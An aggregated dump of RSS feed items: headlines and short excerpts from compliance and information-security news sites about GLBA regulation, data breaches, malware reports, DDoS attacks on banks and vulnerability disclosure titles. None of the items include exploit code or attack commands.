http://www.compliancehome.com/rss/resources-GLBA.xml With smartphones gaining traction in the consumer world, it's easy to forget that handsets are simply mini computers that could contain sensitive data about business contacts and inter-office electronic communication. In addition to putting in place a procurement policy that includes checks and balances for who gets what type of wireless device and plan, as well as a usage policy to make sure employees aren't overusing mobile services for personal use, implementing a solid security policy is also essential, said Pankaj "PJ" Gupta, founder and CEO of Amtel, a company that helps enterprises to rein in wireless management expenses and improve productivity.

==> Updated AMU Kit Offered to FaceTime's Unified Security Gateway 3.0

http://www.compliancehome.com/rss/resources-GLBA.xml A purveyor of applications designed to promote the secure use of Web 2.0 and unified communications in the commercial segment, FaceTime Communications, announced the commercial launch of its Augment, Migrate and Update, or AMU, kit. The kit is devised for enterprises that are at the brink of expensive upgrades needed to maintain compliance with enterprise security and control standards, which are essential to manage the changing face of the Internet.

==> Former Chairman of the Federal Reserve Wants to Bring Back 1933 Glass-Steagall Act

http://www.compliancehome.com/rss/resources-GLBA.xml The former Chairman of the Federal Reserve [1979-1987], Paul Volcker, has advised the Obama Administration to bring back the 1933 Glass-Steagall Act [SGA]. The Glass-Steagall Act was repealed in 1999 and replaced with the Gramm-Leach-Bliley Act [GLBA]. The GLBA removed restrictions on commercial banks and investment banks, allowing them gross latitude in activities and services. (Reem Heakel, 2009)

==> SOX, GLBA and HIPAA: Multiple Regulations, One Compliance Solution - Vendor Webcast

http://www.compliancehome.com/rss/resources-GLBA.xml SOX, GLBA and HIPAA share a common regulatory compliance thread - the need to use automation to ensure continuous compliance with required IT controls. View this webcast for an overview of each regulation. Also, gain an understanding of the capabilities an organization must have in place to address these requirements.

==> Data Security should be ensured by the Strategy

http://www.compliancehome.com/rss/resources-GLBA.xml Over the past few years, with the rise in incidents of identity theft many organizations are rightfully concerned about keeping their customers' data private. While the financial service industry has been regulated since the late '90s by the federal government, other companies would be wise to follow their lead. For some years now, financial service companies have had to comply with the provisions of the oft-maligned Gramm Leach Bliley Act. Among other things, GLBA calls for a process that begins with an assessment of an organization's information systems, development of a security strategy, implementation of the strategy and, finally, ongoing monitoring.

==> FDA's Growing Role Regulating Health 2.0, Health IT

http://www.compliancehome.com/rss/resources-GLBA.xml That federal regulation is part of the deal is very well known by many who are involved in the world of health IT. Issues of health information privacy have been subject to an array of federal and state laws for decades. HIPAA, the Federal Privacy Act, laws governing Medicaid, Medicare, the Veterans Health Administration, funds used for the treatment of mental illness, sexually transmitted infections, and on and on all have privacy provisions. There is a similar regulatory scheme for data security, again including HIPAA, the Gramm-Leach-Bliley Act and other laws.

==> SOX, GLBA and HIPAA: Multiple Regulations, One Compliance Solution

http://www.compliancehome.com/rss/resources-GLBA.xml SOX, GLBA and HIPAA share a common regulatory compliance thread - the need to use automation to ensure continuous compliance with required IT controls. These regulations require technical safeguards to protect or guarantee the veracity of critical information. With SOX, it's for public companies to guarantee accurate financial accounting. GLBA protects personal financial information of an organization's customers. And HIPAA protects and guarantees the privacy of an individual's personal health information (PHI). What all three have in common is the requirement for specific IT controls. Learn more about these regulations and how to automate manual processes with an integrated change auditing and configuration control solution.

==> Severance of Duties in Virtualized Environments

http://www.compliancehome.com/rss/resources-GLBA.xml With virtualization we have moved a step closer to the world of Star Trek. Think back to episodes of The Next Generation where Geordi was able to control the functions of the entire ship through a single touch-screen interface. He was able to reconfigure electrical, mechanical and propulsion systems without needing anyone else or additional authorization. The only thing to prevent him from doing something risky or damaging was the computer system itself.

==> Availability of OfficeScreen Complete Announced by ANXeBusiness Corp.

http://www.compliancehome.com/rss/resources-GLBA.xml A leading provider of networking and security managed services, ANXeBusiness Corp., announced the availability of OfficeScreen Complete, a fully managed security solution providing comprehensive protection from web-based threats, advanced remote access capabilities, and productivity enhancement tools. Built upon two powerful security technologies - ANX OfficeScreen and ANX PositivePro - OfficeScreen Complete combines an award-winning managed firewall, site-to-site VPN, URL filtering, and remote access technology into one hosted solution. Additionally, when supporting five or more users, OfficeScreen Complete can also include wireless access point security, traffic shaping, and Internet failover support.

==> Bank compliance laws need to be streamlined to really help consumers

http://www.compliancehome.com/rss/resources-GLBA.xml In today's scenario it has become a must for banks to devote a huge amount of time and resources, at great expense, to keeping up with the never-ending cascade of new laws and regulations and keeping in compliance with the myriad existing ones. Before Congress enacts legislation implementing the part of the administration's regulatory reform proposal that calls for the establishment of a new Consumer Financial Protection Agency, it should take a close look at the compliance burdens already heaped upon banks.

==> Vital Information Security and Compliance Activities for 2010

http://www.compliancehome.com/rss/resources-GLBA.xml It has always been a challenge for businesses and organizations of all sizes to manage the security of critical information. Even companies that invest in the latest security infrastructure and tools soon discover that these technology-based solutions are short-lived.

==> Data Loss Prevention not a solution

http://www.compliancehome.com/rss/resources-GLBA.xml One of the powerful tools that many organizations are using to prevent the unauthorized copying or transmission of confidential or personal data is Data Loss Prevention (DLP). Organizations spend a tremendous amount of money and time to set up firewalls and intrusion detection solutions to prevent attackers from the outside from gaining access to internal assets. However, what about the internal threat? A Web page, an e-mail with a client list, or personal data copied to a USB drive are all examples of data that can leave an organization unmonitored and undetected.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Join this webinar to learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes; go beyond intrusion detection and prevention to a positive, proactive security model that protects against new email and web-borne attacks; safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information; and implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations.

==> Real-Life Log Management Challenges for Financial Institutions

http://www.compliancehome.com/rss/resources-GLBA.xml With hundreds and thousands of automated systems producing log data, an organization's ability to respond to

==> Email Security and Archiving - Clearer in the Cloud

http://www.compliancehome.com/rss/resources-GLBA.xml The time is NOW for businesses and organizations of all sizes to implement cloud computing solutions for email security and archiving. Cloud computing solutions are more effective than traditional, on-premise solutions and at a fraction of the cost and IT resource requirements. Listen to this live TechRepublic Webcast, featuring moderator Steve Kovsky and featuring special guests Michael Osterman, President of Osterman Research and Adam Swidler with Google. They present findings, regarding the latest research comparing cloud solutions with on-premise solutions.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes; go beyond intrusion detection and prevention to a positive, proactive security model that protects against new email and web-borne attacks; safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information; and implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations.

==> Generating grounds for identity theft

http://www.compliancehome.com/rss/resources-GLBA.xml The federal GLBA, HIPAA, FACTA and its Red Flags and Disposal Rules, state data breach notification laws and hundreds of other federal and state laws and industry regulations like PCI-DSS are intended to protect the privacy and security of consumers' personally identifiable and financial information entrusted to businesses and other organizations. Many such regulations aim to prevent identity theft and privacy violations.

==> The Price of Not Complying With GLBA

http://www.compliancehome.com/rss/resources-GLBA.xml The Gramm-Leach-Bliley Act (GLBA) requires financial institutions to create and maintain an information security program to protect customer information. This webcast highlights GLBA and Technology safeguards, the price of not complying, how to identify technology compliance areas, compliance policy and process - who implements and how, and Tripwire GLBA Product/Service offerings.

==> SAS 70 Certification Completed by CRG West

http://www.compliancehome.com/rss/resources-GLBA.xml A developer, manager and operator of data centers, CRG West, has completed SAS 70 Type II certification at the company's Boston and Chicago data centers. The company believes the completion of this certification process in Boston and Chicago has made the outsourced data center selection process more efficient for prospective customers from all industries.

==> CIO Strategies for Retention and Deletion of Email and Electronic Information

http://www.compliancehome.com/rss/resources-GLBA.xml Over the past two years, major changes to the Federal Rules of Civil Procedure (FRCP) and the increase in state and federal compliance regulations have created new challenges for companies as they struggle to manage email retention and deletion policies. To successfully maintain compliance and protect their business in the event of litigation, companies must understand these changes. Implementing new strategies for email will enable organizations to effectively set and manage email retention and deletion policies, as well as provide robust search and e-Discovery capabilities to respond rapidly to litigation.

==> Improve Performance, Reduce Data Growth Costs - Archiving ERP Applications

http://www.compliancehome.com/rss/resources-GLBA.xml View this Webcast to find out from the experts how effective application archiving can help you effectively manage your production database, control data growth, and ultimately improve your bottom line.

==> Using Email Encryption to Enforce Security Policies for PCI, GLBA & HIPAA Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml Ensuring your organization complies with today's increasingly complex regulations and industry mandates around email and data security can be both a legal and technical minefield. First you need to understand what data should be protected. Then you need to determine who in your organization has access to that data and is sending it to people outside of the organization. You also need to invest in technology to enforce your compliance policies. It can be intimidating for any IT department. Hearing how your peers have tackled these challenges can help you plan your approach to finding a solution. Watch the webinar,

==> Email is Critical...and Out of Control!

http://www.compliancehome.com/rss/resources-GLBA.xml More than 75% of the average company's intellectual property is contained in email messages and their attachments. As a result, email has quickly become the file server of choice for most of us - and a headache for compliance managers. The value of unified information access to live and archived email via desktop or mobile device is becoming increasingly important for today's businesses - from end users to the board room, where compliance is an ongoing pain point.

==> The Top 10 Benefits of SaaS-enabled Email Management

http://www.compliancehome.com/rss/resources-GLBA.xml Email is indisputably the most important business application for most organizations. Yet, managing it has always been a no-win proposition. Add the pressure of fewer people and resources as well as shrinking budgets these days, and it seems that the pain of managing email can only get worse. But don't despair, there's a new breed of managed SaaS-enabled email services that are modular, reliable, and secure for virtually any type of business.

==> Tech Insight: What Penetration Testers Find Inside Your Network

http://www.darkreading.com/rss/all.xml Inside flaws include unpatched systems, open file shares or information stores, and lack of proper network segmentation

==> Zero-Day Attacks Long-Lived, Presage Mass Exploitation

http://www.darkreading.com/rss/all.xml Zero-day attacks escape detection for an average of 10 months; once they go public, attacks multiply dramatically, researchers find

==> Citadel Trojan Gets More Customer-Friendly

http://www.darkreading.com/rss/all.xml RSA says 'Rain Edition' offers dynamic configuration for bots, friendlier user interface

==> Apple Removes Default Java Support In Browsers

http://www.darkreading.com/rss/all.xml Some Java security headache relief for Mac users

==> Product Watch: New Fortinet Tools Help Enforce Policy By Device, Reputation

http://www.darkreading.com/rss/all.xml FortiOS 5.0 enables enterprises to restrict user access based on behavior, device ownership

==> Could Hackers Change Our Election Results?

http://www.darkreading.com/rss/all.xml Many of the same vulnerabilities exist in electronic voting systems as the last time we elected a president, and new ones abound that could put voter databases at risk and undermine civic confidence

==> Adobe Bolsters Security In Reader, Acrobat XI

http://www.darkreading.com/rss/all.xml Adobe builds on its sandboxing protections as part of a series of moves to improve security

==> The Secure Operating System Equation

http://www.darkreading.com/rss/all.xml Many experts like the idea of a purpose-built, secure operating system. It's just that adopting one is not so straightforward, even if it's specifically for security-strapped SCADA systems

==> What Huawei, ZTE Must Do To Regain Trust

http://www.darkreading.com/rss/all.xml A recently issued U.S. congressional report has cast a shadow on Chinese telecom equipment makers Huawei and ZTE. Because neither company answered congressional queries to the satisfaction of U.S. lawmakers, the report concludes that the two companies, as a result of ties to the Chinese government, cannot be trusted to supply telecommunications equipment to U.S. government agencies or U.S. companies. Both companies vigorously argued against the report's conclusions. Huawei condemned the report as an attempt "to impede competition and obstruct Chinese [telecom] companies from entering the U.S. market." ZTE insisted its equipment is safe and that congressional concerns implicate "every company making equipment in China, including Western vendors." U.S. lawmakers worry that Chinese-made telecom equipment could contain a hidden backdoor that could be used to eavesdrop on sensitive communications or to disrupt network infrastructure. The version of the report released to the public (a separate classified annex was withheld) contains no evidence that Huawei or ZTE have compromised their products at the behest of Chinese officials. But lack of transparency into the workings of the two companies and lack of answers to lawmakers' queries, in conjunction with ongoing reports about cyber attacks traced to China, have made it difficult for U.S. authorities to trust either company.

==> 3 Must-Fix Vulnerabilities Top Oracle CPU Patches

http://www.darkreading.com/rss/all.xml Two CVSS 10.0 and one 9.0 flaws top the charts on a Critical Patch Update list chock full of remotely exploitable vulnerabilities

==> Communication Confidential: Startup Offers P2P Encrypted Voice, Text, Video

http://www.darkreading.com/rss/all.xml Startup Silent Circle rolls out encrypted text, voice, video -- and soon, email -- for the ultra privacy- and security-conscious

==> Meet Flame Espionage Malware Cousin: MiniFlame

http://www.darkreading.com/rss/all.xml Ongoing teardowns of the Flame malware and its underlying components have yielded a surprising discovery: a new piece of malware. Security researchers at Kaspersky Lab said that what they previously suspected was an attack module for the Flame malware is instead a standalone piece of attack code, although it can do double duty as a plug-in for both the Flame and Gauss malware. Designed for data theft and for providing attackers with direct access to an infected system, MiniFlame is based on the same architectural platform as Flame, according to Kaspersky Lab. "MiniFlame is a high-precision attack tool," said Alexander Gostev, chief security expert at Kaspersky Lab, in an emailed statement. "Most likely it is a targeted cyberweapon used in what can be defined as the second wave of a cyberattack ... to conduct more in-depth surveillance and cyber-espionage."

==> Keeping Data Out Of The Insecure Cloud

http://www.darkreading.com/rss/all.xml Companies looking to keep their data safe need to give their employees a choice of solid file-sharing services and apps. Otherwise, it's back to their insecure favorites

==> Researchers Identify Banks Targeted In Forthcoming Attack

http://www.darkreading.com/rss/all.xml Bank of America, Chase, Citibank said to be among institutions under the gun from planned Gozi-Prinimalka malware attack

==> A False Sense Of Security

http://www.darkreading.com/rss/all.xml Cutting-edge security technologies are critical to safeguarding data integrity. However, organizations need to also focus on developing effective policies and practices to fully protect crucial information assets

==> Next-Generation Malware: Changing The Game In Security's Operations Center

http://www.darkreading.com/rss/all.xml Sophisticated, automated malware attacks are spurring enterprises to shift their security technology, staffing strategies

==> BYOD: Filling The Holes In Your Security Policy

http://www.darkreading.com/rss/all.xml Allowing personal mobile devices at work can create new risks for your enterprise. Is your security policy ready?

==> U.S. Defense Secretary Sends Veiled Warning To Iran

http://www.darkreading.com/rss/all.xml Panetta says Tehran is developing cyberplans; former official says U.S. has linked Iran to attack at Saudi Aramco

==> Security Monitoring An Elixir For Intrusion Costs?

http://www.darkreading.com/rss/all.xml A recent study of the costs of cybercrime finds that security intelligence, including monitoring and threat intelligence, reduces the costs of cyberattacks the most

==> Bolster SMB Security Practices, Budgets Through Risk Management

http://www.darkreading.com/rss/all.xml Simplification of risk quantification, smart partnering, and automation all play a role in helping SMBs take advantage of IT risk management benefits

==> Popular RATs Found Riddled With Bugs, Weak Crypto

http://www.darkreading.com/rss/all.xml Research by former interns for Matasano Security exposes flaws in remote administration tools

==> Finding Against Chinese Firms Has Lessons For Security Professionals Beyond Mere Avoidance

http://www.darkreading.com/rss/all.xml Sometimes the biggest threats to data security hide in plain sight

==> Florida University Breach Exposes Data On 279,000

http://www.darkreading.com/rss/all.xml At least 50 Northwest Florida State College employees hit by identity theft at this point -- including the university's president

==> Report: Four Out Of Five Phishing Attacks Use Security Scams

http://www.darkreading.com/rss/all.xml Phishers scare users into clicking by sending security 'alerts,' Websense says

==> Dodging 5 Dangerous Database Default Settings

http://www.darkreading.com/rss/all.xml Out-of-the-box settings and weak configuration of databases make it easier for thieves to break into data stores and harder for IT to quickly detect breaches

==> HSBC Latest Financial Company Hit in Wave of DDoS Attacks

http://www.eweek.com/rss-feeds-45.xml HSBC joins the list of financial companies recently hit by hackers. A group affiliated with Anonymous has taken credit for the attack.

==> Zero-Day Attacks Escape Detection for Nearly a Year: Symantec Study

http://www.eweek.com/rss-feeds-45.xml Attacks using undisclosed "zero-day" vulnerabilities remain hidden for anywhere from 19 days to 30 months, according to new research that found 11 previously undetected attacks.

==> Kaspersky Lab Developing Secure OS for Industrial Control Systems

http://www.eweek.com/rss-feeds-45.xml A secure operating system designed specifically for critical infrastructure companies will provide a new layer of protection against attacks, the security firm says.

==> Cyber-Security Threats Unaddressed by Small Businesses: Symantec

http://www.eweek.com/rss-feeds-45.xml Small-business owners are woefully unprepared when it comes to protecting their companies from various forms of internal and external security threats.

==> Google Privacy Policies Assailed by EU: Report

http://www.eweek.com/rss-feeds-45.xml Google isn't being clear enough about how it uses consumer data that it collects from its users, says the European Union.

==> British Hacker McKinnon Wins Long Fight Against Extradition to U.S.

http://www.eweek.com/rss-feeds-45.xml Gary McKinnon will not face extradition to the U.S. on charges of hacking military computers, according to a decision today by Britain's home secretary. British authorities must now decide if he will face charges in the U.K.

==> Courion Access Insight Detects Data Security Risks at HCR ManorCare

http://www.eweek.com/rss-feeds-45.xml HCR ManorCare is using Courion's Access Insight application to develop reports on risks to patient data privacy and to prevent security breaches.

==> MiniFlame Backdoor Steals Middle East Data

http://www.eweek.com/rss-feeds-45.xml Security firms find a program linked to the Flame and Gauss cyber-spy tools that steals data from and provides access to high-profile targets.

==> Iranian Cyber-Attack Is Most Destructive to Date Says Defense Secretary

http://www.eweek.com/rss-feeds-45.xml Leon Panetta warns Iran that the United States is prepared to take action against cyber-attacks if national interests are threatened as the Pentagon readies cyber-defenses.

==> Data Breach Leads to Identity Theft at Northwest Florida State College

http://www.eweek.com/rss-feeds-45.xml An attack on Northwest Florida State College computer systems resulted in a data breach that has affected nearly 300,000 people and led to reports of identity theft and fraud.

==> More Banks Come Under Denial-of-Service Attack

http://www.eweek.com/rss-feeds-45.xml Capital One and SunTrust came under attack this week using denial-of-service techniques that are evading defenses meant to blunt such attacks.

==> Firefox 16 Re-Released After Serious Security Flaw Is Patched

http://www.eweek.com/rss-feeds-45.xml Less than 24 hours after removing the Firefox 16 browser from its downloads page after a security flaw surfaced, Mozilla re-releases Firefox 16.

==> Irish Google, Yahoo Domains Taken Offline Briefly After Security Breach

http://www.eweek.com/rss-feeds-45.xml Users of Google.ie and Yahoo.ie were impacted by the incident, which stemmed from an unauthorized access of a registrar's account. The DNS name server records of both domains were changed to point to other name servers associated with well-known hacking sites, officials say.

==> Certificate Authority Security: Seven Ways to Defend Against Hacking

http://www.eweek.com/rss-feeds-45.xml We detail some advice from Venafi, GlobalSign and others that can help keep CAs safe, and help your organization in the event of a CA compromise.

==> [dos] - Internet Explorer 9 XSS Filter Bypass

http://www.exploit-db.com/rss.php Internet Explorer 9 XSS Filter Bypass

==> [webapps] - CMSQLITE v1.3.2 Multiple Vulnerabilities

http://www.exploit-db.com/rss.php CMSQLITE v1.3.2 Multiple Vulnerabilities

==> [webapps] - Joomla Tags (index.php, tag parameter) SQL Injection

http://www.exploit-db.com/rss.php Joomla Tags (index.php, tag parameter) SQL Injection

==> [webapps] - Joomla Freestyle Support 1.9.1.1447 (com_fss) SQL Injection

http://www.exploit-db.com/rss.php Joomla Freestyle Support 1.9.1.1447 (com_fss) SQL Injection

==> [papers] - Whitepaper : Exploiting Transparent User Identification

http://www.exploit-db.com/rss.php Whitepaper : Exploiting Transparent User Identification

==> [remote] - ManageEngine Security Manager Plus <= 5.5 build 5505 Remote SYSTEM SQLi (MSF)

http://www.exploit-db.com/rss.php ManageEngine Security Manager Plus <= 5.5 build 5505 Remote SYSTEM SQLi (MSF)

==> [remote] - ManageEngine Security Manager Plus <= 5.5 build 5505 Remote SYSTEM/root SQLi

http://www.exploit-db.com/rss.php ManageEngine Security Manager Plus <= 5.5 build 5505 Remote SYSTEM/root SQLi

==> [webapps] - ManageEngine Security Manager Plus <= 5.5 build 5505 Path Traversal

http://www.exploit-db.com/rss.php ManageEngine Security Manager Plus <= 5.5 build 5505 Path Traversal

==> [webapps] - OTRS 3.1 Stored XSS Vulnerability

http://www.exploit-db.com/rss.php OTRS 3.1 Stored XSS Vulnerability

==> [local] - Oracle Database Authentication Protocol Security Bypass

http://www.exploit-db.com/rss.php Oracle Database Authentication Protocol Security Bypass

==> Well Websecurify Runs on The iPhone

http://www.gnucitizen.org/feed/ This is not necessarily news anymore since it was discussed on the Websecurify official blog but we are so excited about it that we could not hold ourselves from posting it here too. The testing engine used in this particular version of Websecurify is optimized to run with the least possible amount of memory. The results of the scanner are as good as those produced by all other Websecurify variants although in some cases it may miss some statistically unlikely types of issues. [...]

==> Stuxnet

http://www.gnucitizen.org/feed/ I have been avoiding the topic of Stuxnet for quite some time, mainly because there were many others who spent the time to take the virus apart. However, here is a video, which I find rather amusing: Whether this is the real deal or simply fear mongering, I simply don’t know. It is all speculation at the moment. [...]

==> Having fun with BeEF, the browser exploitation framework

http://www.gnucitizen.org/feed/ We haven’t featured any guest bloggers in a while, but we’re glad to be featuring Christian Frichot this month! Christian is a security professional based in Perth, Western Australia. He’s currently working in the finance industry as part of a tight-knit internal team of security consultants doing their best to protect their business and customers from technical threats such as malware or insecure web applications. [...]

==> ColdFusion directory traversal FAQ (CVE-2010-2861)

http://www.gnucitizen.org/feed/ A new Adobe hotfix for ColdFusion has been released recently. The vulnerability, which was discovered by Richard Brain, was rated as important by Adobe and could affect a large number of Internet-facing web servers. The FAQ below is meant to shed some light on this vulnerability so that ColdFusion administrators can understand what they’re up against. [...]

==> 1ST European Edition of HITB Coming Up!

http://www.gnucitizen.org/feed/ In case you haven’t heard yet, HITBSecConf is hosting the first European Edition of their conference in Amsterdam during 1st-2nd July ’10. The history of the HITB conferences can be traced back to 2002, the year in which the first ever edition of HITB took place in Malaysia. Since then, HITB has grown to become the biggest technical computer security event in Asia and has extended their presence to the Middle East and now Europe. [...]

==> Hacking Linksys IP Cameras (pt 6)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN articles: here, here, here, here and here. As we know, there are several ways one could go about hunting for IP cameras on the net. The slowest way would be to portscan random IP addresses for certain ports and programmatically detect if the web interface of a given camera was available on the open ports found. [...]

==> Dnsmap v0.30 is now out!

http://www.gnucitizen.org/feed/ After working on dnsmap for a few months whenever time allowed, I decided there were enough additional goodies to make version 0.30 a new public release. Let me just say that a lot of the bugs that have been fixed, and features that have been added to this version would not be possible without the feedback from great folks such as Borys Lacki (www.bothunters.pl), Philipp Winter (7c0.org) and meathive (kinqpinz.info). Thanks guys, your feedback was highly valuable to me. [...]

==> Old-school Remote Command Exec Vulnerabilities on Avaya Intuity

http://www.gnucitizen.org/feed/ Remember those old remote command exec vulns where you had a CGI script such as a perl program which would take input from the client to construct command strings that would then be passed to the shell environment? Well, there were tons of those affecting diagnostic scripts available on the web interface of Avaya Intuity Audix LX. These vulnerabilities, although cool, are not critical since you need to be logged into the interface in order to exploit them. [...]

==> Skydive

http://www.gnucitizen.org/feed/ What is the best way to spend a quiet weekend afternoon? Jump off a perfectly working plane while 10,000 feet in the air. On 5th of July 2009, the GNUCITIZEN team and friends came together to perform a skydiving gig. [...]

==> Free Web Application Security Testing Tool

http://www.gnucitizen.org/feed/ Automated web application security testing tools are at the core of modern penetration testing practices. You cannot rely 100% on the results they produce without seriously considering their limitations. However, because these tools are so good at picking the low-hanging fruit by employing force and repetition, they still have a place in our arsenal of penetration testing equipment. These tools are not unfamiliar to modern day penetration testers. [...]

==> Of Sec Cons and Magstripe Gift Cards

http://www.gnucitizen.org/feed/ I’ve been meaning to talk about CONFidence and EUSecWest for quite a while, but May was such an intense month for me, that’s hardly left me with any time for other things. I eventually got caught up with other matters, which resulted in me publishing this post about 2 months late. I’ve been researching, pentesting, and preparing two different presentations which I gave at CONFidence in Krakow, and EUSecWest in London. pdp has also been busy presenting at AusCERT2009. [...]

==> CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept

http://www.gnucitizen.org/feed/ I couldn’t find any public PoC/exploit for this phpMyAdmin vulnerability, despite it being a serious bug affecting a popular open-source project. I think this vulnerability is a nice reminder that it’s still possible to perform remote command execution these days without relying on SQL injection (i.e.: xp_cmdshell) or a memory corruption bug (i.e.: heap overflow). [...]

==> Hacking Linksys IP Cameras (pt 5)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN articles: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3), Hacking Linksys IP Cameras (pt 4). Mounting the filesystem on your workstation: There are many ways to mount the camera’s filesystem using the firmware binary. In this post, we’ll explain one way to mount firmware version v1.00R24 which is the latest available for the WVC54GCA model. [...]

==> Breaking Into a Home With an iPhone

http://www.gnucitizen.org/feed/ This is going to be one of these quick posts which just makes you think what the information security landscape will be like in 5 years. Before I move on with my commentary, here is a video which is essential for you to watch. Got the idea? No? Let me explain. What you see in the video above is an application for the iPhone which gives you detailed characteristics of properties (houses) in USA. [...]

==> Extensions at War

http://www.gnucitizen.org/feed/ Oh yes, the digital battlefield is taking unusual shapes. The latest manifestation of cyber warfare is a conflict between the Adblock Plus and the NoScript extensions. The story goes that NoScript used some JavaScript tactics and, of course, some obfuscations in order to cripple the Adblock Plus functionalities. This attack was a response to Adblock Plus blocking NoScript ads which you see when you upgrade the extension, which as you know happens quite regularly, don’t know why. [...]

==> Exploit Sweatshop

http://www.gnucitizen.org/feed/ When I was playing/introducing the partial disclosure practice a year and something ago, I did get contacted by numerous dodgy characters willing to buy yet undisclosed vulnerabilities for substantial amounts of money. Of course, requests of that nature were kindly ignored. I couldn’t believe that someone was willing to give me so much money for something I virtually spent 2-3 hours maximum to produce. [...]

==> Jeriko Group and Source Code Repository

http://www.gnucitizen.org/feed/ Jeriko moved into its own source code repository which you will be able to find here. There is also a discussion group here, if you feel like using it. The version inside the new code repository is very different from the version you’ve seen before. The main difference is that while the old version is basically a collection of scripts, the new version implements its own shell (wrapper around bash) which does the heavy lifting and also introduces some funky programming mechanisms. [...]

==> Hacking Linksys IP Cameras (pt 4)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3). There are two types of vulnerabilities I will be releasing today: disclosure of credentials in client-side source code and multiple XSS. [...]

==> Hacking Linksys IP Cameras (pt 3)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2). Unlike the previous two vulnerabilities I released, the vulnerabilities I’m releasing in this post are perhaps not so useful to break into the device as you need access to the admin account to exploit them. [...]

==> Hacking Linksys IP Cameras (pt 2)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN article, which includes an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1). Privilege escalation via arbitrary file retrieval: The second vulnerability I’ll be releasing is an arbitrary(ish) file retrieval vulnerability. It’s not fully arbitrary because you can only retrieve the contents of files located within the same directory where the vulnerable CGI program is located. [...]

==> Key Parts of Ubuntu 13.04 Will Be Developed in Secret

http://www.hackinthebox.org/backend.php http://www.extremetech.com/wp-content/uploads/2012/10/ubuntu-logo-348x196.jpg In a twist that is sure to raise eyebrows and cause no end of neckbeard scratching, Canonical founder and Ubuntu's de facto spiritual leader, Mark Shuttleworth, has announced that key parts of Ubuntu 13.04 will be developed in secret. Tags: Ubuntu, Linux, Security

==> FTC puts a bounty on the heads of robo-telemarketers

http://www.hackinthebox.org/backend.php http://cdn.arstechnica.net/wp-content/uploads/2012/10/red_telephone2.jpeg The race against robots is on: the Federal Trade Commission is offering $50,000 cash to anyone who can come up with a way to eliminate the insidious telemarketing robocall, it announced Thursday. While it may take a sizable workload, a good kill-switch for the spammy pre-recorded messages could put an end to the annoying overtures on the phone to enter a new sweepstakes, qualify for a new credit card, or get a new energy provider. Tags: Industry News, FTC

==> Hack In The Box 2012 Malaysia: Like No Other

http://www.hackinthebox.org/backend.php http://cdn-static.zdnet.com/i/r/story/70/00/005720/original/hack-in-the-box-2012-620x.jpeg?hash=ZmtkMGWwMJ Hack In The Box SecConf 2012 Malaysia just celebrated its ten-year mark in Kuala Lumpur, Malaysia. Hack In The Box stages its high-profile hacker conferences in Asia, the Middle East and Europe, bringing together an unusual mix of security professionals, members of the hacker underground, researchers and - yes - law enforcement. Tags: HITB, HITB2012KUL, Industry News

==> Analysis of How Bitcoin Is Actually Used

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Bitcoin The Bitcoin scheme is a rare example of a large scale global payment system in which all the transactions are publicly accessible (but in an anonymous way). We downloaded the full history of this scheme, and analyzed many statistical properties of its associated transaction graph. Tags: BitCoin, Industry News

==> New Citadel trojan costs more, but allows for easier updates

http://www.hackinthebox.org/backend.php http://i.haymarket.net.au/News/20120703113706_citadel%20trojan%20ss.png Code writers behind the latest Citadel trojan, dubbed the "Rain Edition," have added advanced features and significantly boosted the price tag of the malware. The new iteration includes a feature, called "Dynamic Config," which allows botmasters easier access to compromised victims' machines by updating the malware's configuration file immediately. Configuration files are used by owners of command-and-control servers to communicate malicious instructions to hacked PCs under their control. Tags: Viruses & Malware

==> Ubuntu 12.10 "Quantal Quetzal" officially released

http://www.hackinthebox.org/backend.php http://www.h-online.com/imgs/43/9/3/4/8/7/4/01amazon-dash-03649164378becb1.png Nearly six months after Ubuntu 12.04 LTS arrived, Canonical and the Ubuntu developers have released version 12.10 of their Ubuntu Linux distribution, code-named "Quantal Quetzal". The new version of the popular open source operating system uses a kernel based on the 3.5 Linux kernel and updates the Unity desktop with a number of new features and enhancements. Tags: Ubuntu, Linux

==> Sprint acquires controlling stake in Clearwire

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Clearwire Sprint Nextel has secured control of Clearwire, the wireless network operator that holds valuable spectrum, according to a regulatory filing on Thursday. The filing shows that Sprint agreed on Wednesday to acquire the interests in Clearwire held by Craig O. McCaw's Eagle River Holdings. The transfer of Class A shares and Class B interests gives Sprint a majority stake of 50.8 percent of Clearwire. Tags: Industry News

==> 1080p on a smartphone screen—can it possibly matter?

http://www.hackinthebox.org/backend.php http://cdn.arstechnica.net/wp-content/uploads/2012/10/6931914496_588c6f8dbb_z.jpg It's no secret that phone displays are getting big, much bigger than they used to be. The iPhone got bumped up a notch (from 3.5 inches to 4 inches), Nokia's Lumia display is gargantuan (4.3 inches), and some of the Android phones launching this quarter come with 4.7-inch displays. Tags: Hardware, Technology

==> Pirate Bay Moves to The Cloud, Becomes Raid-Proof

